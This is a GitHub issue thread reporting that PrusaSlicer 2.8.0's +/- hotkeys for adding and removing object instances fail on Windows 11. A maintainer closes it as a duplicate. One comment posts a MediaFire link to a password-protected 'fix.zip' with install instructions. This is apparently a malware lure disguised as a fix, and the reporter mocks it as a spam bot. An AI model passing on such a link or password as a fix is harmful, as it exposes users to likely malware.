prusa3d/PrusaSlicer #13309: Add instance" and "Remove instance" hotkeys don't work (Win11)

TacII, 2024-08-29:
### Description of the bug

Pressing + or - on the keyboard does not Add or Remove an instance of an object in the Plater-view. Right clicking on the object or in the Name-view or the top GUI all works it's just the Add/Remove Instance or +/- keys that don't respond. All other keyboard shortcuts work normally.

Similar to [this issue](https://github.com/prusa3d/PrusaSlicer/issues/5350) except that moving the mouse from right panel to object view doesn't make it work either.

[image]

### Project file & How to reproduce

[Bananaduck.zip](https://github.com/user-attachments/files/16795055/Bananaduck.zip)

### Checklist of files included above

- [X] Project file
- [X] Screenshot

### Version of PrusaSlicer

2.8.0+win64

### Operating system

Windows 11 23H2, Build 22631.4108

### Printer model

Prusa MK3, Octoprint on RPi5

kehkou, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

TacII, 2024-08-29:
> Download https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file password: changeme In the installer menu, select "gcc."

Hello Mr. Spamvirus-bot. How are you doing today?

lukasmatena, 2024-08-29:
Closing as a duplicate of https://github.com/prusa3d/PrusaSlicer/issues/13043. It will be fixed in 2.8.1, which will be released soon.

closed 2024-08-29 by lukasmatena